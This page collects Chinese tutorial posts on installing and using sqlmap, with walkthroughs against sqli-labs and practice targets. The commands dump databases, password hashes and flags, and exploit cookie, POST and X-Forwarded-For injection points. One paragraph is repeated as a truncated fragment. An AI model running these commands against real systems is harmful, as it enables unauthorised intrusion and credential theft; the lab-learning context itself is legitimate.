精华内容
下载资源
问答
  • sqlmap

    2021-01-04 14:20:35
    SQLMap安装 1.1 任务描述 ​ 如何提高进行SQL注入的效率?利用工具是一个很好的选择。SQLMap就是进行SQL注入的工具。 1.2 课程目标 ➢了解SQLMap的原理、主要特点。 ➢掌握SQLMap的安装。 1.3 SQLMap简介 1.3.1 ...

    一. SQLMap安装

    1.1 任务描述

    ​ 如何提高进行SQL注入的效率?利用工具是一个很好的选择。SQLMap就是进行SQL注入的工具。

    1.2 课程目标

    ➢了解SQLMap的原理、主要特点。

    ➢掌握SQLMap的安装。

    1.3 SQLMap简介

    1.3.1 SQLMap定义

    ​ SQLMap是开源的自动化SQL注入工具,由Python写成。它可以自动探测和利用SQL注入漏洞来接管数据库服务器,它配备了一个强大的探测引擎,为最终渗透测试人员提供很多功能,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。

    1.3.2 SQLMap特点

    1.3.2.1 支持的数据库类型

    ​ sqlmap完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。

    1.3.3 SQLMap的可以测试的几个参数

    ​ sqlmap可以提供一个简单的URL,Burp或WebScarab请求日志文件,文本文档中的完整http请求或者Google的搜索,匹配出结果页面,也可以自己定义一个正则来判断那个地址去测试。

    ​ sqlmap可以测试GET参数,POST参数,HTTP Cookie参数,HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入,它也可以指定用逗号分隔的列表的具体参数来测试。

    ​ sqlmap也可以设定HTTP(S)请求的并发数,来提高盲注时的效率。

    1.3.3.1 支持的注入模式

    ​ sqlmap支持五种不同的注入模式:

    ​ 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

    ​ 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

    ​ 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

    ​ 4、联合查询注入,可以使用union的情况下的注入。

    ​ 5、堆查询注入,可以同时执行多条语句的执行时的注入。

    1.3.3.2 其他

    ⚫在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。

    ⚫支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。

    ⚫支持自动识别密码哈希格式并通过字典破解密码哈希。

    ⚫支持多种下载模式,比如完全地下载某个数据库中的某个表,或者只下载某个表中的某几列,甚至只下载某一列中的部分数据均可以进行,这完全取决于用户的选择。

    ⚫支持在数据库管理系统中搜索指定的数据库名、表名或列名。

    ⚫部分情况下,即当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时,支持下载或上传文件。

    ⚫部分情况下,即当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时,支持执行任意命令并回现标准输出。

    1.4 SQLMap参数说明

    1.4.1 输出级别(Output verbosity)的参数

    参数:-v。

    ​ Sqlmap的输出信息按从简到繁共分为7个级别,依次为0、1、2、3、4、5和6。使用参数“-v <级别>”来指定某个等级,如使用参数“-v 6”来指定输出级别为6。默认输出级别为1。各个输出级别的描述如下:

    ​ 0:只显示Python的tracebacks信息、错误信息[ERROR]和关键信息[CRITICAL];

    ​ 1:同时显示普通信息[INFO]和警告信息[WARNING];

    ​ 2:同时显示调试信息[DEBUG];

    ​ 3:同时显示注入使用的攻击荷载;

    ​ 4:同时显示HTTP请求;

    ​ 5:同时显示HTTP响应头;

    ​ 6:同时显示HTTP响应体。各个级别输出的信息详细到什么程度,还需要自己尝试下,亲眼见到,才会有明确的认识。

    1.4.2 指定目标的参数

    Sqlmap运行时必须指定至少一个目标,支持一次指定多个目标。有以下几种指定目标的方式:

    1.4.2.1 直接连接数据库参数:-d

    ​ 使用参数“-d”直接连接数据库,该参数后跟一个表示数据库的字符串,该字符串有以下两种格式:

    ​ (1).当数据库管理系统是MySQL、Oracle、Microsoft SQL Server或PostgreSQL等时格式为:DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

    ​ (2).当数据库管理系统是SQLite、Microsoft Access或Firebird等时格式为:DBMS://DATABASE_FILEPATH

    1.4.2.2 指定目标URL参数:-u 或–url

    ​ 使用参数“-u”或“–url”指定一个URL作为目标,该参数后跟一个表示URL的字符串,可以是http协议也可以是https协议,还可以指定端口,如:python sqlmap.py -u “http://192.168.56.102:8080/user.php?id=0”

    1.4.2.3 从Burp或WebScarab的代理日志中解析目标参数:-l

    ​ 使用参数“-l”指定一个Burp或WebScarab的代理日志文件,Sqlmap将从日志文件中解析出可能的攻击目标,并逐个尝试进行注入。该参数后跟一个表示日志文件的路径。Burp默认不记录日志,想要记录日志需要手动开启,设置方法如下图所示:

    image-20201021161832410

    ​ 只用勾选代理中的请求数据就足够了,日志文件路径可随意设置,这里我设置日志文件名为proxy.log,放在用户主目录中。

    ​ 设置浏览器的代理为Burp,随便浏览几个网页后发现proxy.log竟然已经有70多K大,查看其内容,部分输出如下:

    image-20201021162150784

    ​ 可以看到该日志文件不仅记录了GET参数,还记录了cookie和POST参数。现在使用如下命令让Sqlmap解析该日志文件,自动寻找目标,检测注入漏洞:python sqlmap/sqlmap.py -l…/proxy.log

    注意日志文件的路径要写正确。执行该命令时,每找到一个可能的攻击目标,Sqlmap都会询问是否要检测该目标,默认回答为“Y”,想要测试该目标,直接按回车键就行。

    qlmap/sqlmap.py -l…/proxy.log

    注意日志文件的路径要写正确。执行该命令时,每找到一个可能的攻击目标,Sqlmap都会询问是否要检测该目标,默认回答为“Y”,想要测试该目标,直接按回车键就行。

    ​ 当日志较大时会有很多可能目标,虽然有询问机制但依旧麻烦,因为不能一路按回车而要进行判断。若是可以对日志进行过滤就好了,sqlmap的确可以做到,参数为“–scope”。

    展开全文
  • SQLmap

    千次阅读 2019-10-21 10:18:42
    本文为学习笔记,仅限学习交流 不得利用、从事危害国家或人民...方法:打开sqlmap输入Python sqlmap.py -u +url 1、指定目标注入地址)检测出存在可利用漏洞 python2 sqlmap.py -u “http://127.0.0.1/sqli/less...

    本文为学习笔记,仅限学习交流
    不得利用、从事危害国家或人民安全、荣誉和利益等活动

    python2安装包:链接:https://pan.baidu.com/s/19jv1KZiBP8LiW3JbJKwo_w
    提取码:ullc

    Sqlmap安装包:链接:https://pan.baidu.com/s/1p533gyUcCIPvGuxnwJhAPA&shfl=sharepset
    提取码:8ad4

    简介:
    一、安装python环境
    二、解压SQLmap 并创建快捷方式
    (注意:要解压sqlmap的时候,直接解压到python文件夹下)
    三、SQLmap 爆出数据库

    SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
    方法:打开sqlmap输入Python sqlmap.py -u +url
    (本机SQLmap 是基于python2 环境运行,故调用python2. 请参照自己PC情况而定)

    第一:python环境安装:
    SQLmap是由python语言开发的工具,所以要先安装python环境
    1、运行python的安装程序选中自主安装
    点击打勾✔:Add PythonPATH (添加python的环境变量)
    2、默认全选点击next进行安装
    3、可自定义python的安装位置,点击install
    4、安装完成,点击close关闭
    确认安装:
    打开cmd,输入python,能直接进入回显python版本信息说明安装成功
    在这里插入图片描述

    第二:下载好的SQLmap文件直接解压到python文件夹下
    创建桌面快捷方式

    在这里插入图片描述

    1、进入到Python2,sqlmap目录下,右键点击sqlmap,py类型文件发送到桌面快捷方式。
    在这里插入图片描述
    2、将快捷方式重命名为sqlmap,然后右键属性—在目标栏输入:“%windir%\system32\cmd.exe”

    此时,SQLmap的快捷方式就创建好了
    确认:打开快捷方式,输入 python sqlmap.py
    页面显示:
    在这里插入图片描述

    第三:SQLmap 命令使用

    1、指定目标注入地址)检测出存在可利用漏洞
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”

    在这里插入图片描述
    在这里插入图片描述
    2、曝出所有数据库名称:–dbs:dbs前面有两条杠
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --dbs

    在这里插入图片描述
    3、web当前使用的数据库
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --current-db

    在这里插入图片描述
    4、列出当前数据库里所有的用户
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” --users

    在这里插入图片描述

    5、列出当前数据库里的当前用户
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–current-user

    在这里插入图片描述
    6、列出当前数据库里账户名,密码
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”–passwords

    在这里插入图片描述

    sqlmap已经做了MD5解密

    在这里插入图片描述

    7、列出数据库中的表参数:(-D:指定数据库名称 --tables:列出表)
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security --tables

    在这里插入图片描述

    8、列出表中字段 (-D:指定数据库名称;-T:指定要列出字段的表;–columns:指定表的所有列 )
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1”-D security -T users --columns

    在这里插入图片描述
    9、列出三个数据列中所有的数据: (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、–dump:导出列里面的字段)。
    python2 sqlmap.py -u “http://127.0.0.1/sqli/less-3/?id=1” -D security -T users -C id,username,password --dump

    在这里插入图片描述

    展开全文
  • Sqlmap

    2020-12-31 20:40:04
    Sqlmap 1、Sqlmap对get请求数字型、字符型注入## 标题 2、sqlmap对Get请求注入 对http://www.whalwl.host:8001/bug/sql_injection/sql_num.php进行get注入 命令python sqlmap.py -u ”...

    Sqlmap

    1、Sqlmap对get请求数字型、字符型注入## 标题
    2、sqlmap对Get请求注入
    对http://www.whalwl.host:8001/bug/sql_injection/sql_num.php进行get注入
    命令python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” --dbs
    在这里插入图片描述

    查询dwvs库表名
    命令:

    python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs --tables
    

    在这里插入图片描述
    查dwvs库中flag表的字段名
    命令:

    python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag --columns
    

    在这里插入图片描述

    显示flag表中flag字段
    命令:

    python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” -D dwvs -T flag -C flag --dump
    

    在这里插入图片描述

    Sqlmap对post请求注入

    首先用burp进行抓包
    在这里插入图片描述
    将报文复制粘贴在1.txt 将1.txt放入
    在这里插入图片描述

    命令:

    python sqlmap.py -r 1.txt
    

    在这里插入图片描述

    查库
    命令:

    python sqlmap.py -r 1.txt --dbs
    

    在这里插入图片描述

    查test库中表名
    命令:

    python sqlmap.py -r 1.txt -D test --tables
    

    在这里插入图片描述

    查wan表中字段
    命令:

    Python sqlmap.py -r 1.txt -D test -T wan --columns
    

    在这里插入图片描述

    显示字段
    命令:

    Python sqlmap.py -r 1.txt -D test -T wan -C username,password --dump
    

    在这里插入图片描述

    2、对此网站进行sqlmap cookie注入

    http://www.whalwl.host:8009/user.php?id=1
    命令:

    Python sqlmap.py -u “http://www.whalwl.host:8009/user.php?” --cookie “id=1--level 2 --tables
    

    在这里插入图片描述
    查this_flag字段
    命令:

    python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag --columns
    

    在这里插入图片描述
    查看flag值
    命令:

    python sqlmap.py -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1"  --level 2 -T this_flag -C flag --dump
    

    在这里插入图片描述

    3、Sqlmap搜索型注入

    http://www.whalwl.host:8002/search.php
    查数据库
    命令:

    python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" --dbs
    

    在这里插入图片描述
    查dwvs库表名
    命令:

    python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs --tables
    

    在这里插入图片描述
    查flag字段
    命令:

    python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag --columns
    

    在这里插入图片描述

    flag值
    命令:

    python sqlmap.py -u "http://www.whalwl.host:8002/search.php?search=21" -D dwvs -T flag -C flag --dump
    

    在这里插入图片描述

    4、X-Forwarded-For注入 手工注入和sqlmap注入
    1、Sqlmap注入
    Burp抓包
    并添加
    X-Forwarded-for: 8.8.8.8*
    在这里插入图片描述
    复制粘贴至1.TXT
    在这里插入图片描述
    命令:

    python sqlmap.py -r 1.txt --dbs
    

    在这里插入图片描述

    命令:

    python sqlmap.py -r 1.txt -D xff --tables
    

    在这里插入图片描述
    命令:

    python sqlmap.py -r 1.txt -D xff -T this_flag --columns
    

    在这里插入图片描述

    命令:

    python sqlmap.py -r 1.txt -D xff -T this_flag -C flag --dump
    

    在这里插入图片描述

    2、手工注入

    链接:
    https://blog.csdn.net/mutou990/article/details/107761999

    展开全文
  • SQLMap

    2019-09-29 02:15:30
    安装SQLMap  1. 安装python  官网https://www.python.org/ 选择最新版本下载安装即可  因为SQLMap使用Python写的 ,所以没有Python的环境SQLMap无法运行  2. 安装SQLMap  官网 http://sqlmap.org/ 选择...

    安装SQLMap

      1. 安装python 

        官网https://www.python.org/ 选择最新版本下载安装即可

        因为SQLMap使用Python写的 ,所以没有Python的环境SQLMap无法运行

      2. 安装SQLMap

        官网 http://sqlmap.org/ 选择最近版本安装即可

      3. 设置环境变量

        为了使用便利,将SQLMAP的安装目录添加到系统环境变量中

        之后在CMD中就可以直接使用SQLMap了

        不设置环境变量的话,要把CMD的当前目录切换到SQLMap安装目录才可以使用

    1. 首先百度下载Python:这里最新的版本为2.7.9,并且根据自己电脑是32位还是64位,下载相应的版本,我的系统是64位的,所以这里我选择X64位的软件,注意sqlmap只兼容2.7版本的Python以这个为例;

       

       
    2. 2

       然后再把sqlmap下载下来:

       

    3. 3

      我们先把上面两个软件下载下来后,首先开始安装Python,直接双击下载好的Python的安装包,如图:

       
       
       2.2.  默认,Next;
    4.  

       2.3.  将“Add python.exe to Path"项勾选,勾选后安装完成不再需要单独添加环境变量,默认是“去勾选”的;

      2.4.安装完成后,重启系统,查看是否生效,“Win+R”,输入cmd,然后输入python

       

       

    5. 4

      然后我们在开始安装sqlmap,下载好的sqlmap,我们将下载的首先解压,然后将目录更改为SQLMap,

       

       
    6. 5

       然后我们将SQLMap复制到Python的安装目录下,如下图所示

       

       

    7. 6

      然后新建立一个cmd的快捷方式,并命名为叫“SQLMap”,

       


       

       
       
    8. 7

      然后右键属性

       

    9. 8

      这里我们需要修改2个地方,一个是“目标”,一个是“起始位置”;

      然后在新建快捷方式上右键“属性”,将“起始位置”修改为 C:\Python27\sqlmap,然后确定;

       

    10. 9

      修改完路径后,就可以按照我们的喜好,修改下颜色,字体,大小,等等,这里我就不做修改了,直接点击“应用”,“确定”即可;

    11. 10

      双击我们刚才创建的快捷方式:如下图

       

    12. 11

      我们测试下;

      4.4.  双击刚才创建的快捷方式,输入sqlmap.py -h,出现如下信息则表示安装成功

      如果能出现下面的基本就可以安装成功了。

       
    13. 注意如果报错:说明是与Python的版本不兼容

     

    转载于:https://www.cnblogs.com/insane-Mr-Li/p/10148378.html

    展开全文
  • SQLMAP

    2019-10-21 12:34:52
    SQLMAP介绍 当然也可以过一些waf sqlmap安装 基本的参数 –is-dba 基本的还是 sqlmap.py -u"测试的网址" current就是当前的 时间延迟类型 测得是union联合查询类型的 这个是sqlmap跑出来的一个 第一行说的是在id...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 10,172
精华内容 4,068
热门标签
关键字:

sqlmap